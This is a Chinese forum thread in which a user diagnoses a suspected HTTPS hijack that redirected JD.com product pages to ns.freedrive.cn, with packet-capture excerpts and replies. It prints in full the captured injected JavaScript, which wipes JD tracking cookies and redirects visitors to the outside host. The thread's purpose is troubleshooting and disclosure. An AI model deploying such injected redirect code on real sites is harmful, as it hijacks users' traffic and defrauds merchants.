https劫持？

显示全部楼层 · 发表于 2018-8-11 23:41:01

本帖最后由随便注册于 2018-8-16 17:36 编辑

其它浏览器调用IE打开网址：https://item.jd.com/**********.html

IE被劫持至：https://ns.freedrive.cn/?s=**********&g=https://item.jd.com/**********.html

没能复现

https是怎么劫持到**********.html地址的？排查本机无果，搜了搜有遇到这个的，但都是http的网址被劫持。难道是京东的证书对运营商不保密？
不知道到期后的会怎样，看是上交还是泄露

＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
20180814又出现了，并且重现一次，抓到一点过程

全部是https，由于两次都是跳的商品页面，所以先用IE打开店铺页面，从这里不停打开具体的商品页面，终于有一次网站响应不对劲，然后就跳了。哪个商品页面才833字节？之后又试了几十次，不能重现。

浏览器请求
GET /******.html HTTP/1.1

网站响应
Content-Length: 833

浏览器请求
CONNECT ns.freedrive.cn:443 HTTP/1.0

＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
20180816
抓住代码了，833字节，那么就确认不是本机问题。虽然该js不需要知道具体的**********.html地址，但篡改https内容，要么出了大漏洞，要么京东证书漏了或密钥被利用了。
还一种可能，这个网址跳转了能赚钱？京东自己干的？
『求救』京东网址出现“尾巴”(京东确认是他们的问题，现已恢复。此帖结束)_病毒救援区_安全区卡饭论坛 - 互助分享 - 大气谦和!
https://bbs.kafan.cn/thread-2113223-1-1.html

<!DOCTYPE html><html><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0"><meta name="referrer" content="never"><title></title></head><body><script type="text/javascript">try {var u = "https://ns.freedrive.cn?s=0039CDECC&g="+window.location.href;var im = /(iPad|iPhone|Mobile|Android)/i.test(navigator.userAgent);if(im){u = "https://ns.freedrive.cn?s=0039CDECC&g="+window.location.href;}var domain = location.host.substr(location.host.indexOf("."));var al = ["__jda", "__jdb", "__jdc", "__jdv", "__jdu", "CCC_SE", "unpl"];for (var i = 0; i < 7; i++) {document.cookie = al[i] + "=;expires=Thu, 01 Jan 2010 00:00:00 GMT; path=/; domain=" + domain;}window.location.href = u;} catch(e) {window.location.href = u;}</script></body></html>

复制代码

——————————————————
楼主没明确说京东链接是不是https
点击某东的商品链接，却出现这个网站，提示不安全，电脑中毒了吗【firefox吧】_百度贴吧
http://tieba.baidu.com/p/5719477483

显示全部楼层 · 发表于 2018-8-12 08:25:34

捷酷科技
http://si.trustutn.org/info?sn=2 ... 4414&certType=1

显示全部楼层 · 发表于 2018-8-12 11:09:39

抓包，抓包·····

[其他] https劫持？